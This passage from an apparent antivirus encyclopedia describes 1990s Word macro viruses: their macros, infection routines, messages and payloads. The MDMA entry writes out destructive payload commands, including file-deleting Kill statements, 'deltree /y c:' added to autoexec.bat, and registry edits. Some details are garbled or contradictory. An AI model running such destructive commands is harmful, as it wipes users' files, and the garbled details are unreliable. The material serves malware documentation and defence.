  13413. When closing an infected document, the following text
  13414. is displayed:
  13415.  
  13416. "Auf Wieder÷ffnen"
  13417.  
  13418. "P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei"
  13419. "gerne wiederhaben moechten, sollten Sie einen"
  13420. "Blick in das neue Verzeichnis C:\TROJA werfen..."
  13421.  
  13422. Any Word 2.0 documents which include the trojan, 
  13423. includes the following text:
  13424.  
  13425. "Trojanisches Pferd "
  13426. "Wenn Sie diese Zeilen lesen, wurde bereits Ihre
  13427. AUTOEXEC.BAT- Datei aus dem"
  13428. "Hauptverzeichnis C:\ entfernt. Hoffentlich haben Sie 
  13429. eine Kopie davon ?    "
  13430.  
  13431. "Genauso einfach waere es gewesen, Ihre Festplatte 
  13432. zu loeschen und mit ein  "
  13433. "klein wenig mehr Aufwand koennte man auch einen Virus 
  13434. installieren. "
  13435. (c) Stefan Kurtzhals 
  13436.  
  13437.  
  13438. [Word.Wazzu]
  13439. Virus Name: Wazzu 
  13440. Alias Name: WM.Wazzu 
  13441. Virus Type: Word macro virus
  13442. Virus Length: 632 Bytes (1 Macro)
  13443. Symptoms: Words in the active document are erased
  13444.           The word 'wazzu' is inserted
  13445. Place of origin: Washington, United States
  13446. Description: This virus infects MS Word documents.      
  13447. Wazzu.A has only one unencrypted macro which has
  13448. a size of 632 Bytes, (starting letter is not capitalized).
  13449.  
  13450. "autoopen"
  13451.  
  13452. When an infected document is opened, Wazzu.A checks
  13453. the name of the active document. If it is
  13454. "NORMAL.DOT", then the virus macro is copied from the
  13455. global template (NORMAL.DOT) to the open document. 
  13456. Otherwise NORMAL.DOT becomes infected. Upon
  13457. infection documents, are changed into templates which 
  13458. is very common for macro viruses.
  13459.  
  13460. Wazzu does not bypass the prompting from Microsoft 
  13461. Word before saving the NORMAL.DOT file. Also 
  13462. Wazzu.A does not check if a document is already
  13463. infected. It simply overwrites the "autoopen" macro.
  13464.  
  13465. Wazzu has a destructive payload. It picks a random 
  13466. number between 0 and 1.  and if the number smaller 
  13467. than 0.2 (probability of 20 percent), the virus will 
  13468. move a word from one place in the document to
  13469. another. This is repeated three times. So the probability
  13470. for a Word to be moved is 48.8 percent.  After the third
  13471. time, Wazzu picks a final random number (between 0 and 1)
  13472. and if the value is higher than 0.25 (probability of 25
  13473. percent), the word Wazzu will be inserted into
  13474. the document.
  13475.  
  13476. After an infected documents is cleaned, it has to be 
  13477. checked really careful because chances of having a 
  13478. modified document (words swapped or added) are
  13479. over 61 percent. This can be a very time consuming
  13480. job with large documents.
  13481.  
  13482. Wazzu is a nickname for the Washington State University.
  13483. Since Wazzu.A uses the "autoopen" macro, it also
  13484. works with other versions of Microsoft Word, such as 
  13485. the German version.
  13486. (c) Stefan Kurtzhals 
  13487.  
  13488.  
  13489. [Word.Reflex]
  13490. Virus Name: Reflex 
  13491. Alias Name: RedDwarf
  13492. Virus Type: Word macro virus
  13493. Virus Length: 897 Bytes in .doc files and 1226 
  13494.             Bytes in .dot files (3 or 4 Macros)
  13495. Symptoms: Display of Windows
  13496. Place of origin: Ireland
  13497. Description: This virus infects MS Word documents.
  13498. Delete virus macros from infected documents
  13499. (AutoOpen, FClose, FileClose, FA)
  13500. Reflex contains 3 encrypted macros (Execute-Only) with
  13501. a size of 897 Bytes.
  13502. "AutoOpen"
  13503. "FClose"
  13504. "FileCLose"
  13505. An infected global template contains one more macro 
  13506. ("FA"). Upon infection, Reflex turns off the prompting of
  13507. Word to ensure a hidden infection of the global template
  13508. (NORMAL.DOT). Infected documents are saved with the
  13509. password "Guardian". They are also converted internally
  13510. to templates, which is very common for macro viruses.
  13511.  
  13512. Reflex was written at an anitvirus conference after an 
  13513. Anti-Virus company announced a challenge to hackers 
  13514. to break its new technology. Any author of a new 
  13515. undetected macro virus was supposed to receive 
  13516. champagne as a reward.
  13517.  
  13518. When Reflex infects a file it displays the following window:
  13519. "Now, Where's that Jerbil of Bubbly? "
  13520.  
  13521. Some replicants of Reflex will also display the following 
  13522. Wordbasic error message:
  13523. "Document not open"
  13524.  
  13525.  
  13526. [Word.Polite]
  13527. Virus Name: Polite 
  13528. Alias Name: WW2Demo
  13529. Virus Type: Word macro virus
  13530. Virus Length: 1918 Bytes (2 Macros)
  13531. Symptoms: Display of text windows
  13532. Place of origin: United States
  13533. Description: This virus infects MS Word documents.
  13534.  
  13535. Polite was first created with Microsoft version 2.0, yet
  13536. also works with higher versions because newer releases 
  13537. of Word are compatible with older versions.
  13538.  
  13539. Polite consists of two unencrypted macros with a size
  13540. of 1918 Bytes.
  13541. "FileClose"
  13542. "FileSaveAs"
  13543. Polite can be called a demonstration virus and is very 
  13544. unlikely to spread. Before each attempted infection, 
  13545. it displays a window with the following question:
  13546.  
  13547. " Shall I infect the file ? "
  13548.  
  13549. If the user answers with the "No" button , no document 
  13550. becomes infected.  While it asks for permission to infect
  13551. files, it does not ask for permission to infect the global 
  13552. template (NORMAL.DOT). 
  13553.  
  13554. Upon infection of the global template or when an infected
  13555. document is closed, Polite will display the following
  13556. message:
  13557.  
  13558. "I am alive! "
  13559.  
  13560.  
  13561. Once Polite infects a Word 6.0/7.0 document it can not 
  13562. infect Word 2.0 documents anymore.
  13563.  
  13564. The global template (NORMAL.DOT) becomes infected 
  13565. when an infected document is closed (only when there is 
  13566. no FileClose macro). Documents become infected upon 
  13567. using the "FileSaveAs" command. Polite does not use any
  13568. Auto-macros and can therefore not be blocked by the
  13569. /m parameter.
  13570.  
  13571. Polite does not work with foreign versions of Microsoft 
  13572. Word, since it uses the English macro names "FileSaveAs" 
  13573. and "FileClose".
  13574.  
  13575. (c) Stefan Kurtzhals 
  13576.  
  13577.  
  13578. [Word.Pheeew]
  13579. Virus Name: Pheeew 
  13580. Alias Name: Dutch, NietGoed, Pheeew:NL
  13581. Virus Type: Word macro virus
  13582. Virus Length: 2759 Bytes (4 Macros)
  13583. Symptoms: Display of text, 
  13584.          Deletes files in C:\ and C:\DOS
  13585. Place of origin: Unknown
  13586. Description: This virus infects MS Word documents.
  13587.  
  13588. Pheeew is the first Dutch macro virus, which is strongly 
  13589. based on the Concept macro virus. Pheeew also has 4 
  13590. unencrypted macros:
  13591.  
  13592. "AutoOpen"
  13593. "IkWordNietGoed1"
  13594. "IkWordNietGoed2"
  13595. "Lading"
  13596.  
  13597. When an infected document is opened, Pheeew checks 
  13598. for a previous infection of the global template 
  13599. (NORMAL.DOT). Pheeew does this by looking for the
  13600. two names of the macros "Lading" and "BestandOpslaanAls". 
  13601. When NORMAL.DOT is not infected, Pheeew copies its 
  13602. virus macros into the global template.  The macro 
  13603. "IkWordNietGoed2" is saved under the name 
  13604. "BestandOpslaanAls" ("FileSaveAs").
  13605.  
  13606. Documents are infected when the "FileSaveAs" command 
  13607. is used. Documents are also changed into templates which
  13608. is very common for macro viruses. After infection the 
  13609. virus shows various windows with the following text:
  13610.  
  13611. Window "Important":
  13612. " Gotcha ! "
  13613. Window "FINAL WARNING!":
  13614. "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
  13615.  
  13616. Upon clicking the "No" button on the last window, a destructive 
  13617. payload is activated. All files in the "C:\" and "C:\DOS" are 
  13618. deleted (certain file attributes are bypassed).
  13619.  
  13620. Pheees also contains the following texts:
  13621.  
  13622. "Done by the Catman "
  13623. Macro "Lading":
  13624. " Sub MAIN                                                                  "
  13625. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC                      "
  13626. "   REM              *** WARNING ***                                        "
  13627. "   REM You're computer could be killed right now!                          "
  13628. "   REM Thank to you and me it's still ok!                                  "
  13629. "   REM Next time will be worse!                                            "
  13630. "   REM              *** PHEEEW! ***                                        "
  13631. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC                      "
  13632. " End Sub                                                                   "
  13633. Pheeew does not work with versions other than the Dutch version
  13634. of Microsoft Word.
  13635.  
  13636. (c) Stefan Kurtzhals 
  13637.  
  13638.  
  13639. [Word.PCW]
  13640. Virus Name: PCW 
  13641. Alias Name: Birthday, B-Day, Suzanne
  13642. Virus Type: Word macro virus
  13643. Virus Length: 1039 Bytes (2 Macros)
  13644. Symptoms: Display of message
  13645. Place of origin: German computer magazine
  13646. Description: This virus infects MS Word documents.
  13647. PCW contains two encrypted (Execute-Only) macros 
  13648. with a size of 1039 Bytes.
  13649. "AutoOpen"
  13650. "DateiSpeichernUnter"
  13651. The name was selected because its code was published 
  13652. in the German magazine "PC Welt". We expect to see 
  13653. other variants of this virus, since the code was available 
  13654. to the public.
  13655.  
  13656. Upon opening an infected document, PCW will infect 
  13657. the global template (NORMAL.DOT). Further 
  13658. documents are infected when the "DateiSpeichernUnter"
  13659. command is used. Infected documents are internally 
  13660. converted into templates, which is very common for 
  13661. macro viruses PCW is also known under the name 
  13662. "Birthday", since it displays the following window:
  13663.  
  13664. " Happy Birthday! Herzlichen Glⁿckwunsch... "
  13665.  
  13666. PCW uses German macro names and will therefore only 
  13667. work with the German version of Microsoft Word.
  13668.  
  13669.  
  13670. [Word.Nuclear.B]
  13671. Virus Name: Nuclear.B
  13672. Alias Name: Alert
  13673. Virus Type: Word macro virus
  13674. Virus Length: 3458 Bytes (7 Macros)
  13675. Symptoms: Text added to printed documents
  13676.           Files deleted, Change of File attributes
  13677. Place of origin: France
  13678. Description: This virus infects MS Word documents.
  13679. Nuclear.B is a direct variant of Nuclear.B. The virus 
  13680. author of Nuclear.B probably received the 
  13681. unencrypted source code of Nuclear.A which helped
  13682. hicode of Nuclear.A m to create this new variant.
  13683.  
  13684. The (main) only difference between Nuclear.A and 
  13685. Nuclear.B is that Nuclear.B does not try to drop the 
  13686. "PH33r" virus. It also contains 7 unencrypted macros 
  13687. with a size of 1458 Bytes instead of 9 (Execute-Only)
  13688. encrypted macros.
  13689.  
  13690. "AutoExec"
  13691. "AutoOpen"
  13692. "FilePrint"
  13693. "FilePrintDefault"
  13694. "FileSaveAs"
  13695. "InsertPayload"
  13696. "Payload"
  13697.  
  13698. Nuclear.B is activated with the "AutoExec" and 
  13699. "AutoOpen" macro. Before it infects the global template 
  13700. (NORMAL.DOT) it checks for a previous infection. It 
  13701. does not infect if it finds the "AutoExec" macro. After
  13702. the virus macros have been transfered to the global template, 
  13703. it calls its destructive payloads.
  13704.  
  13705. Nuclear.B infects documents when they are saved with the 
  13706. "FileSaveAs" function, whereby all infected documents are 
  13707. internally converted into templates. This procedure is very 
  13708. common for macro viruses.
  13709.  
  13710. Since Nuclear.B uses English macro names, such as 
  13711. "FileSaveAs", it does not work with foreign versions of 
  13712. Microsoft Word, such as the German version. 
  13713.  
  13714.  
  13715. [Word.Nuclear]
  13716. Virus Name: Nuclear
  13717. Alias Name: Alert
  13718. Virus Type: Word macro virus
  13719. Virus Length: 10556 Bytes (9 Macros)
  13720. Symptoms: Text added to printed documents
  13721.           System files deleted on April 5th
  13722.  
  13723. Place of origin: Australia
  13724. Description: This virus infects MS Word documents.
  13725.  
  13726. Nuclear was the second macro virus found "In-the-Wild" 
  13727. (after Concept).  It was distributed, over the Internet in 
  13728. a document with information about the Concept virus. 
  13729. It was also the first macro virus that used Execute-Only
  13730. (encrypted) macros to make analysis more difficult.
  13731.  
  13732. Nuclear has 9 macros with a size of 10556 Bytes.
  13733.  
  13734. "AutoExec"
  13735. "AutoOpen"
  13736. "DropSuriv"
  13737. "FileExit"
  13738. "FilePrint"
  13739. "FilePrintDefault"
  13740. "FileSaveAs"
  13741. "InsertPayload"
  13742. "Payload"
  13743.  
  13744. Nuclear is activated with the "AutoExec" and "AutoOpen" 
  13745. macro. Before it infects the global template 
  13746. (NORMAL.DOT), it checks for a previous infection. It 
  13747. does not infect if it finds the "AutoExec" macro.
  13748.  
  13749. After the virus macros have been transfered to the 
  13750. global template, Nuclear can call some destructive 
  13751. payloads. In the first it will try and drop the "Ph33r" 
  13752. virus. Between 17:00 and 17:59 it creates a text file,
  13753. including a script of the DOS/Windows-EXE virus 
  13754. "Ph33r". It then uses the DOS command "DEBUG.EXE" 
  13755. to convert the file into an executable file. It also creates the 
  13756. "EXEC_PH.BAT" batch file, and calls it via the Dos shell. 
  13757. This last infection routine is faulty, the DOS-window is 
  13758. closed immediately and the "Ph33r" virus never infects 
  13759. the system.
  13760.  
  13761. In the second, upon printing a document, Nuclear checks 
  13762. the system time and in case of a value bigger than 55 
  13763. in the seconds field, it will add the following text to 
  13764. the end of the printed document:
  13765.  
  13766.  
  13767. "And finally I would like to say: "
  13768.  
  13769. "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC
  13770.  
  13771.  
  13772. The third destructive payload is activated on April 5th, 
  13773. when Nuclear deletes the system files "C:\IO.SYS", 
  13774. "C:\MSDOS.SYS" and "C:\COMMAND.COM.
  13775.  
  13776. Upon closing a file, Nuclear.A turns off the prompting 
  13777. of Word to ensure a hidden infection of the global 
  13778. template (NORMAL.DOT). This protective function
  13779. of Word is therefore effectless against Nuclear.
  13780.  
  13781. Nuclear infects documents when they are saved with 
  13782. the "FileSaveAs" function, whereby all infected documents 
  13783. are internally converted into templates. In addition Nuclear
  13784. does not check documents for a previous infection, it simply 
  13785. overwrites existing macros.
  13786.  
  13787. Since Nuclear uses English macro names, such as 
  13788. "FileSaveAs", it does not work with foreign versions of 
  13789. Microsoft Word, such as the German version.
  13790. (c) Stefan Kurtzhals 
  13791.  
  13792.  
  13793. [Word.NOP]
  13794. Virus Name: NOP
  13795. Alias Name: Nop.A:De
  13796. Virus Type: Word macro virus
  13797. Virus Length: 246 Bytes (2 Macros)
  13798. Symptoms: No destructive symptoms 
  13799. Place of origin: Germany
  13800. Description: This virus infects MS Word documents.
  13801.  
  13802. NOP is the smallest known macro virus having a size of 
  13803. only 246 Bytes. Infected documents contain the following 
  13804. two macros:
  13805. "AutoOpen"
  13806. "NOP"
  13807. NOP is very primitive and has only very few necessary 
  13808. commands to replicate. Both of its two macros are not 
  13809. encrypted. The only special characteristic is that it turns 
  13810. of the prompting of Word before saving the global 
  13811. template (NORMAL.DOT).
  13812.  
  13813. When an infected document is opened, the virus transfers 
  13814. itself to the global template and renames "NOP" into 
  13815. "DateiSpeichernUnter" ("FileSaveAs").
  13816. Additional documents become infected when they are 
  13817. saved. Upon infection documents are also converted to 
  13818. templates which is very common for macro viruses.
  13819.  
  13820. NOP.A does not have a destructive payload, mistake 
  13821. checking, or recognition of already infected documents. 
  13822. Virus macros of already infected documents are simply 
  13823. overwritten.  NOP.A uses the macro name 
  13824. "DateiSpeichern" ("FileSave"), and works therefore only 
  13825. with the German version of Microsoft Word.
  13826.  
  13827. (c) Stefan Kurtzhals 
  13828.  
  13829.  
  13830. [Word.NF]
  13831. Virus Name: NF
  13832. Alias Name: Names, NF:De
  13833. Virus Type: Word macro virus
  13834. Virus Length: 4209 Bytes (6 Macros)
  13835. Symptoms: Display of Windows
  13836. Place of origin: United States
  13837. Description: This virus infects MS Word documents.
  13838. NF contains 2 encrypted macros (Execute-Only) with 
  13839. a size of 286 Bytes.
  13840. "AutoClose"
  13841. "NF"
  13842. When an infected document is opened , NF will infect 
  13843. the global template (NORMAL.DOT). Further 
  13844. documents are infected when they are closed. Infected 
  13845. documents are converted internally to templates which
  13846. is very common for macro viruses.
  13847. Upon infection, NF will display the following message 
  13848. on the bottom of the screen:
  13849.  
  13850. "Traced!"
  13851.  
  13852. NF is one of very few non-destructive macro viruses.
  13853.  
  13854.  
  13855. [Word.MDMA]
  13856. Virus Name: MDMA
  13857. Alias Name: StickyKeys, MDMA-DMV
  13858. Virus Type: Word macro virus
  13859. Virus Length: 1635 Bytes (1 Macro)
  13860. Symptoms: Files are deleted
  13861. Place of origin: United States
  13862. Description: This virus infects MS Word documents.
  13863.  
  13864. MDMA is the first macro virus that will work on 
  13865. Windows, Windows 95, Macintosh and Windows NT. 
  13866. It can be a very destructive macro virus, and Word users 
  13867. are strongly advised to check their system with an 
  13868. up-to-date Anti-Virus program.
  13869.  
  13870. MDMA contains only one macro with a size of 1635 Bytes.
  13871. "AutoClose"
  13872. When an infected document is opened and then closed, 
  13873. MDMA infects the global template (NORMAL.DOT). 
  13874. Further documents are infected when they are closed 
  13875. ("AutoClose"). Infected documents are also converted to 
  13876. templates which is very common for macro viruses.
  13877.  
  13878. If an infected document is loaded on the first of each 
  13879. month, MDMA activates its destructive payloads. 
  13880. The following payloads will be executes, depending
  13881. on the operating system:
  13882.  
  13883. Windows:
  13884. --------
  13885. Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
  13886. This will delete all the directories on the C:\ drive.
  13887.  
  13888. Windows NT:
  13889. -----------
  13890. Kill "*.*"; Kill "c:\shmk."
  13891. This will delete all the files on the C:\ drive
  13892.  
  13893. Macintosh:
  13894. ----------
  13895. Kill MacID$("****")
  13896. This will delete all file on the harddrive.
  13897.  
  13898. Windows 95:
  13899. -----------
  13900. Kill "c" \shmk."; Kill "c:\windows\*.hlp";
  13901. Kill "c:\windows\system\*.cpl"
  13902. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  13903. Panel\Accessibility\Stickykeys", "On", "1", "")
  13904. SetPrivateProfileString
  13905. ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
  13906. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  13907. Panel\Accessibility\HighContrst", "On", "1", "")
  13908.  
  13909.  
  13910. MDMA will also display the following window:
  13911.  
  13912. "  You are infected with MDMA_DMV. Brought to you 
  13913. by MDMA (Many Delinquent  "
  13914. "  Modern Anarchists)."
  13915.  
  13916. To combat destructive macro viruses, such as MDMA, 
  13917. we advise users to use an up-to-date Anti-Virus program.
  13918.  
  13919. Microsoft has also released a new Microsoft Word version, 
  13920. which will warn each time a suspicious macro is loaded. 
  13921. Users can then decide if they want to disable the macro.
  13922.  
  13923. The Microsoft Word upgrade is available for a small fee 
  13924. from Microsoft.
  13925.  
  13926.  
  13927. [Word.Maddog]
  13928. Virus Name: Maddog
  13929. Alias Name: None
  13930. Virus Type: Word macro virus
  13931. Virus Length: 4209 Bytes (6 Macros)
  13932. Symptoms: Documents contain the text string "MadDog"
  13933. Place of origin: Georgia, United States
  13934. Description: This virus infects MS Word documents.              
  13935. Maddog contains 6 macros with a size of 4209 Bytes.
  13936. "AutoOpen"
  13937. "AutoClose"
  13938. "AutoExec"
  13939. "FileClose"
  13940. "FcFinish"
  13941. "AopnFinish"
  13942.  
  13943. When an infected document is opened, MadDog will 
  13944. infect the global template (NORMAL.DOT). Further 
  13945. documents are infected when they are close with the
  13946. "FileClose" command. Upon closing a document, MadDog 
  13947. saves various times to "Temp1" and then saves the active 
  13948. document. Infected documents are converted internally 
  13949. into templates, which is very common for macro viruses.
  13950.  
  13951. Infected documents contain the text string "MadDog".
  13952.  
  13953.  
  13954. [Word.Tele]
  13955. Virus Name: Tele
  13956. Alias Name: LBYNJ:De, Telefonica, Tele, TEC, Tele-Sex
  13957. Virus Type: Word macro virus
  13958. Virus Length: 22256 Bytes (7 Macros)
  13959. Symptoms: Infection with the Kampana.3784 DOS based virus
  13960.          Text added to printed documents
  13961. Place of origin: Germany
  13962. Description: This virus infects MS Word documents. 
  13963. LBYNJ is another German macro virus, which is probably 
  13964. based on previous macro viruses, such as Xenixos. 
  13965. The 7 encrypted (Execute-Only) macros of LBYNJ have 
  13966. a size of 22256 Bytes.
  13967.  
  13968. "AutoExec"
  13969. "AutoOpen"
  13970. "DateiBeenden"
  13971. "DateiDrucken"
  13972. "DateiNeu"
  13973. "DateiOeffnen"
  13974. "Telefonica"
  13975.  
  13976. The macro "AutoExec" includes the infection routine 
  13977. for the global template (NORMAL.DOT), which will not 
  13978. get infected when inside the WIN.INI file. In (entry 
  13979. "Compatibility"), the string "0x0030303" is set to "LBYNJ".
  13980.  
  13981. "AutoExec" also calls the destructive payload in the 
  13982. "Telefonica" macro.  "AutoOpen" starts the "AutoExec" 
  13983. macro, which means the NORMAL.DOT will become 
  13984. infected when an infected document is opened. LBYNJ 
  13985. uses the "Telefonica" macro to check for a previous 
  13986. infection. It will not infect the global template if the macro 
  13987. is already present.
  13988.  
  13989. Documents are infected upon "DateiBeenden" 
  13990. ("FileClose"), "DateiNeu" ("FileNew") and "DateiOeffnen" 
  13991. ("FileOpen"), whereby at the end of "DateiOeffnen" 
  13992. ("FileOpen") the macro "Telefonica is called again.
  13993. Infected documents are changed to templates, which 
  13994. is very common for macro viruses.
  13995.  
  13996. LBYNJ has two destructive payloads. The first can be 
  13997. found in the "DateiDrucken" (FilePrint) macro. Upon 
  13998. printing a documtent, LBYNJ checks the system time 
  13999. and in case of a value less than 10 in the seconds field, 
  14000. it will add the following text to the end of the printed document:
  14001.  
  14002. " Lucifer by Nightmare Joker (1996) "
  14003.  
  14004. The second payload is activated from the "Telefonica" 
  14005. macro when the second field has a value of 0 or 1. 
  14006. ("Telefonica" is called from "AutoOpen", "AutoExec" 
  14007. and "DateiOeffnen"). Is this the case, LBYNJ creates a Debug 
  14008. script, (filename: TELEFONI.SCR), inside the "C:\DOS"
  14009. directory which includes the DOS based virus "Kampana.3784".
  14010.  
  14011. After creating the script file, LBYNJ executes the 
  14012. "TELEFONI.BAT" batch file which will use the DOS command 
  14013. "DEBUG.EXE" to convert the script file into an executable 
  14014. DOS-based virus and then start it.
  14015. (c) Stefan Kurtzhals 
  14016.  
  14017.  
  14018. [Word.Irish]
  14019. Virus Name: Irish
  14020. Alias Name: None
  14021. Virus Type: Word macro virus
  14022. Virus Length: 4152 Bytes (4 Macros)
  14023. Symptoms: Display of windows
  14024. Place of origin: USA
  14025. Description: This virus infects MS Word documents. 
  14026. Irish contains 4 macros with a size of 4152 Bytes.
  14027. "AutoOpen"
  14028. "WordHelp"
  14029. "AntiVirus"
  14030. "WordHelpNT"
  14031. Upon opening an infected document, Irish will infect the 
  14032. global template (NORMAL.DOT). An infected global 
  14033. template contains the "FileSave" macro, instead of 
  14034. "AutoOpen". Futher documents are infected when the 
  14035. "FileSave" command is used. Infected documents are 
  14036. converted internally to templates which is very common 
  14037. for macro viruses.
  14038.  
  14039. Two of the macros, "WordHelp" and "WordHelpNT", 
  14040. do not run automatically.  However, when executed 
  14041. manually by the user, they will change the Windows
  14042. desktop color to green.
  14043.  
  14044. The macro "WordHelpNT" contains a payload which 
  14045. attempts to activate the screen saver and display the 
  14046. following message:
  14047.  
  14048. "Happy Saint Patties Day "
  14049.  
  14050. However the payload seems to be faulty and does not 
  14051. work under Windows 95 (Irish only exists Microsoft Word).
  14052.  
  14053.  
  14054. [Word.DMV]
  14055. Virus Name: DMV
  14056. Alias Name: Impost, Imposter.A, Imposter
  14057. Virus Type: Word macro virus
  14058. Virus Length: 907 Bytes (2 Macros)
  14059. Symptoms: Display of text windows: "DMV"
  14060. Place of origin: England
  14061. Description: This virus infects MS Word documents. 
  14062.  
  14063.  
  14064. DMV is based on the Concept virus, with only 2 
  14065. unencrypted macros.
  14066. "FileClose"
  14067. "DMV"   (FileSaveAs in NORMAL.DOT)
  14068. The global template (NORMAL.DOT) becomes infected 
  14069. when an infected document is closed and the macros 
  14070. "DMV" and "FileSaveAs" are not already present.
  14071. When Imposter.A copies the "DMV" macro, it renames 
  14072. it to "FileSaveAs" and displays the following window:
  14073. "DMV"
  14074. Further documents are infected when the "FileSaveAs" 
  14075. command is used.  Imposter also changes the new 
  14076. infected document to a template, which is very common 
  14077. for macro viruses.  The following text can be found inside 
  14078. DMV, but is not displayed:
  14079.  
  14080. " just to prove another point "
  14081.  
  14082. (This text is based on the Concept virus, which has "this 
  14083. is enough to prove my point" in its code).
  14084.  
  14085. Because of the use of English macro names, the DMV 
  14086. virus does not work with NON-English versions such as the 
  14087. German version of Microsoft Word.
  14088.  
  14089. (c)  Stefan Kurtzhals 
  14090.  
  14091.  
  14092. [Word.Hot]
  14093. Virus Name: Hot
  14094. Alias Name: WM.Hot
  14095. Virus Type: Word macro virus
  14096. Virus Length: 5515 Bytes (4 Macros)
  14097. Symptoms: Text inside documents is deleted
  14098. Place of origin: Unknown
  14099. Description: This virus infects MS Word documents. 
  14100.  
  14101. Hot is a complex virus with 4 encrypted viruses. When 
  14102. an infected document is opened the virus is activated 
  14103. by the AutoOpen macro. Some replicated Hot samples 
  14104. also display the following error message:
  14105. "Unable to load the specified library"
  14106.  
  14107. First Hot turns off the prompting of Word to ensure a 
  14108. hidden infection of the global template (NORMAL.DOT). 
  14109. It also checks the file "WINWORD6.INI" for the following 
  14110. entry: "QLHot". If nothing is present, Hot will record a
  14111. "hot date", 14 days in the future. Is this variable is not 
  14112. already set, the global template becomes infected.
  14113.  
  14114. The InsertPBreak/InsertPageBreak macro does, as its name 
  14115. suggest, will insert a page-break in the current document. 
  14116. However, it is also used by the virus to recognise if a 
  14117. document is already infected.
  14118.  
  14119. Some of the macros are renamed when they are copied 
  14120. by the WordBasic "MacroCopy" command:
  14121.  
  14122. "AutoOpen"          becomes  "StartOfDoc"
  14123. "DrawBringInFrOut"  becomes  "AutoOpen"
  14124. "InsertPBreak"      becomes  "InsertPageBreak"
  14125. "ToolsRepaginat"    becomes  "FileSave"
  14126.  
  14127. In addition the global template contains the following macros:
  14128.  
  14129. "FileSave" (similar to "ToolsRepaginat")
  14130. "StartOfDoc" (similar to "AutoOpen")
  14131.  
  14132. Hot also uses special functions from the Windows file 
  14133. "KERNEL.EXE" (Win API).  It uses the API to find the 
  14134. path for Windows and to open files which are only very 
  14135. simple functions. It should be noted that many other options 
  14136. were available to the virus author.
  14137.  
  14138. The destructive payload, which is reached upon arrival 
  14139. of the "hot date" set under the "QLHot" section in the 
  14140. WINWORD6.ini file, deletes text from the current active 
  14141. document. This payload is bypassed if the file EGA5.CPI
  14142. is present in the "C:\DOS" directory.
  14143.  
  14144. A comment in the virus source code suggests that this is a 
  14145. "feature" designed to protect the virus author and his friends.
  14146. (c) Stefan Kurtzhals 
  14147.  
  14148.  
  14149. [Word.Hassle]
  14150. Virus Name: Hassle
  14151. Alias Name: Bogus
  14152. Virus Type: Word macro virus
  14153. Virus Length: 8283 Bytes (7 Macros)
  14154. Symptoms: Display of windows
  14155. Place of origin: USA
  14156. Description: This virus infects MS Word documents. 
  14157. Hassle contains 7 encrypted (Execute-Only) macros with 
  14158. a size of 8283 Bytes.
  14159. "AutoClose"
  14160. "ToolsMacro"
  14161. "Microsoft01"
  14162. "Microsoft02"
  14163. "Microsoft03"
  14164. "Microsoft04"
  14165. "Microsoft05"
  14166. When an infected document is opened, Hassle will 
  14167. infect the global template (NORMAL.DOT). Hassle 
  14168. uses macro stealth techniques to hide itself. It uses the 
  14169. macro "ToolsMacro" to make recognition of an infected
  14170. document more difficult. If the user selects any command, 
  14171. it will display the following windows and close Microsoft 
  14172. Word:
  14173.  
  14174. " Out of Memory or System Resources"
  14175. Hassle is one of very few non-destructive macro viruses. 
  14176. It only infects other files and displays the following 
  14177. text window
  14178. "Are you sure to Quit?"
  14179.  
  14180. This happens only very few times. The chances are only 
  14181. one in 20, (a probability of 5 percent).
  14182.  
  14183. Another payload asks the user to register software with 
  14184. Microsoft.  Hassle will only accept one answer, which 
  14185. is as follows:
  14186. "Bill Gates", "Microsoft" and "666"
  14187. Whenever the user selects the Tools/Macro command, 
  14188. Hassle will display the following text on the bottom of 
  14189. the screen:
  14190. " Microsoft Word Assistant Version 6.2"
  14191.  
  14192.  
  14193. [Word.HiSexy]
  14194. Virus Name: HiSexy
  14195. Alias Name: Guess, Teaside, Phantom
  14196. Virus Type: Word macro virus
  14197. Virus Length: 1126 Bytes (1 Macro)
  14198. Symptoms: Texts are printed or inserted into documents
  14199.          Opened documents are closed immediately.
  14200.  
  14201. Place of origin: Germany
  14202. Description: This virus infects MS Word documents. 
  14203.  
  14204. Hisexy has only one macro with a size of 1126 Bytes.
  14205. "AutoOpen"
  14206. Hisexy has a very unusual characteristic compared to 
  14207. other macro viruses.  It uses only one Execute-Only 
  14208. macro, "AutoOpen", and does not use common macros 
  14209. such as FileSaveAs to infect other files. All infection 
  14210. routines to infect NORMAL.DOT and regular 
  14211. documents are inside the "AutoOpen" macro.
  14212.  
  14213. When an infected document is opened, Hisexy checks 
  14214. if the document variables are set to "populated". Is this 
  14215. not the case, a new global template (NORMAL.DOT) 
  14216. is created and the virus macro "AutoOpen" is copied
  14217. into the new document. After that the variable is set to 
  14218. "populated" to mark the file as infected. If the variable 
  14219. is already set, the virus infects the new document by 
  14220. transfering the "AutoOpen" macro using the MakroCopy 
  14221. command. Guess is the first macro virus to use the document
  14222. variables as a checking mechanism for already infected 
  14223. documents.
  14224.  
  14225. Because of an error inside the program code, the virus 
  14226. does not replicate properly.
  14227.  
  14228. Upon a random number (between 0 and 100), Hisexy 
  14229. activates various destructive payloads. It changes 
  14230. the active font size or creates a new document 
  14231. (NORMAL.DOT) including the following text:
  14232. "The word is out."
  14233. "The word is spreading..."
  14234. "The Phantom speaks..."
  14235. "Sedbergh"
  14236. "is CRAP"
  14237. "The word spreads..."
  14238. The text will then be printed out.
  14239. The following texts will be inserted into the active 
  14240. document upon the calculated random number:
  14241. "This school is really good.  NOT"
  14242. "We all love Mr. Hirst."
  14243. "M.R.Beard"
  14244. "This network is REALLY fast."
  14245. "Hi Sexy!"
  14246. "Who's been typing on my computer?"
  14247. "Well helloooo there!"
  14248. "Guess who?"
  14249. Also every once in a while, the active document is 
  14250. closed by Guess.  Because Guess uses only the 
  14251. "AutoOpen" macro it also works with other versions of 
  14252. Misrosoft Word such as the German version.
  14253. (c) Stefan Kurtzhals 
  14254.  
  14255.  
  14256. [Word_Goldfish]
  14257. Virus Name: Goldfish
  14258. Alias Name: Fishfood
  14259. Virus Type: Word macro virus
  14260. Virus Length: 1906 Bytes (2 Macros)
  14261. Symptoms: Display of windows 
  14262. Place of origin: USA
  14263. Description: This virus infects MS Word documents.                   
